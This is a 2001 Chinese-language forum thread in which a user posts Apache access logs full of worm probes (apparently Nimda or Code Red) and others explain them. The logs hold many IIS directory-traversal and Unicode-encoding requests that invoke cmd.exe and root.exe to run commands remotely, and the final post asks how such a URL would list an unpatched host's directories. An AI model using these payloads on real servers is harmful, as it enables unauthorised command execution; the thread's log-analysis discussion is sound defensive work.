最近是不是有新版的紅色警戒,請看我的LOG

顯示結果從第 1 筆 到 8 筆,共計 8 筆
  1. #1
    會員 ba88ms21 的大頭照
    註冊日期
    2001-05-10
    討論區文章
    233

    最近是不是有新版的紅色警戒,請看我的LOG

    61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.24.46 - - [19/Sep/2001:14:54:36 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.140.33 - - [19/Sep/2001:14:54:37 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.140.33 - - [19/Sep/2001:14:55:00 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.140.33 - - [19/Sep/2001:14:55:06 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.140.33 - - [19/Sep/2001:14:55:11 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.140.33 - - [19/Sep/2001:14:55:23 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.24.46 - - [19/Sep/2001:14:55:24 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.24.46 - - [19/Sep/2001:14:55:49 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.14.22 - - [19/Sep/2001:14:55:53 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    61.216.14.22 - - [19/Sep/2001:14:55:55 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.36.174 - - [19/Sep/2001:14:57:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    61.216.36.174 - - [19/Sep/2001:14:57:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.36.174 - - [19/Sep/2001:14:57:47 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:57:48 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:57:50 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.36.174 - - [19/Sep/2001:14:57:52 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.36.174 - - [19/Sep/2001:14:58:18 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.36.174 - - [19/Sep/2001:14:58:22 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
    61.216.36.174 - - [19/Sep/2001:14:58:25 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.36.174 - - [19/Sep/2001:14:58:28 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.36.174 - - [19/Sep/2001:14:58:32 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.36.174 - - [19/Sep/2001:14:58:38 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    61.216.186.37 - - [19/Sep/2001:14:58:43 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    61.216.186.37 - - [19/Sep/2001:14:58:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    61.216.186.37 - - [19/Sep/2001:14:58:51 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:58:51 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.186.37 - - [19/Sep/2001:14:58:53 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    61.216.36.174 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    61.216.186.37 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.36.174 - - [19/Sep/2001:14:59:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.186.37 - - [19/Sep/2001:14:59:04 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.36.174 - - [19/Sep/2001:14:59:08 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    61.216.186.37 - - [19/Sep/2001:14:59:09 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    61.216.186.37 - - [19/Sep/2001:14:59:11 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
    61.216.92.80 - - [19/Sep/2001:14:59:13 +0800] "GET /cy/newimage.js HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/style.css HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/await.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/logo.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/pix.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/sun.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/print.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/friend.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/news.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/compaq.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/vote.gif HTTP/1.1" 304 -
    61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/result.gif HTTP/1.1" 304 -
    61.216.186.37 - - [19/Sep/2001:14:59:16 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302



  2. #2
    會員 Ares 的大頭照
    註冊日期
    2001-05-05
    討論區文章
    527
    若沒猜錯的話....
    你是用NT4.0 OR WIN2000吧.
    你有用IIS架WEB Server嗎?
    若沒有拜託移除吧~~~~~~~~~~~~~~
    有人跑到你的c槽去了.....
    在網路上隨便找就有一堆有裝IIS卻毫無防備的PC.....
    就連駭客功力連初級都稱不上的人(像是我)都可以入侵.
    真是搞不懂為什麼有這麼多個人用戶不架Web還裝2000 server,像我裝perfessional不就很好嗎~~~

  3. #3
    會員 ba88ms21 的大頭照
    註冊日期
    2001-05-10
    討論區文章
    233
    不是,我是用apache for win32的,請問這是什麼情況呀

  4. #4
    會員
    註冊日期
    2001-04-15
    討論區文章
    38
    最初由 Ares
    若沒猜錯的話....
    你是用NT4.0 OR WIN2000吧.
    你有用IIS架WEB Server嗎?
    若沒有拜託移除吧~~~~~~~~~~~~~~
    有人跑到你的c槽去了.....
    在網路上隨便找就有一堆有裝IIS卻毫無防備的PC.....
    就連駭客功力連初級都稱不上的人(像是我)都可以入侵.
    真是搞不懂為什麼有這麼多個人用戶不架Web還裝2000 server,像我裝perfessional不就很好嗎~~~
    有切到C槽嗎? 看清楚一點吧..一堆404....-.-

  5. #5
    會員 signally 的大頭照
    註冊日期
    2001-04-28
    討論區文章
    576
    這不是RedCode吧
    紅色警戒是始用緩衝區溢位來入侵
    你的情形是被人家以Unicode裡的
    CGI 編碼錯誤來入侵



  6. #6
    儲存記憶的混合體 deepblue 的大頭照
    註冊日期
    2001-08-08
    所在地區
    ADSL 2/256
    討論區文章
    650
    或許這是BLUECODE 或 NIMDA
    這兩個新病毒可說是紅色警戒的下一代
    就像蟑螂一樣
    愈來愈強

  7. #7
    會員 Ares 的大頭照
    註冊日期
    2001-05-05
    討論區文章
    527
    抱歉ㄚ,了解了.若你的server是用apache for win32,這些log看來是嚐試走IIS的scripts漏洞但沒入侵成功,雖然沒入侵成但是多少會影響頻寬.
    這可能是NIMDA病毒,因為今天此病毒已全面擴散,跟CodeRed影響力差不多.

  8. #8
    會員
    註冊日期
    2001-08-19
    討論區文章
    12
    最初由 Ares
    抱歉ㄚ,了解了.若你的server是用apache for win32,這些log看來是嚐試走IIS的scripts漏洞但沒入侵成功,雖然沒入侵成但是多少會影響頻寬.
    這可能是NIMDA病毒,因為今天此病毒已全面擴散,跟CodeRed影響力差不多.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    請問高手们:
          上述是沒入侵成功、那如果未修正漏洞的主機是不在瀏覽器打入 http://61.216.36.174/scripts/..%%35%...d.exe?/c+dir:D 時就會直接看到該主機的所有目錄了ㄋ 請求個位高手解答,謝謝。

類似的主題

  1. 【問題】微軟最近是不是有病毒入侵?
    作者:mts80140 所在討論版:-- HELP ME 電 腦 軟 硬 體 急 救 版
    回覆: 2
    最後發表: 2004-07-02, 05:06 PM
  2. "請問"---Seednet ADSL最近是不是有問題阿???
    作者:taifeng 所在討論版:---- ADSL 抱 怨 與 鼓 勵
    回覆: 2
    最後發表: 2002-11-12, 02:08 PM
  3. 紅色警戒的作者?
    作者:Duron 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 2
    最後發表: 2001-09-04, 06:58 PM
  4. 最近HIFLY ADSL 速度驟降和"紅色警戒2"有關係嗎?
    作者:akiza 所在討論版:---- ADSL 抱 怨 與 鼓 勵
    回覆: 6
    最後發表: 2001-08-09, 08:00 PM
  5. 紅色警戒病毒來了
    作者:帥毛 所在討論版:-- 閒 話 家 常 灌 水 版
    回覆: 0
    最後發表: 2001-08-01, 11:24 AM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •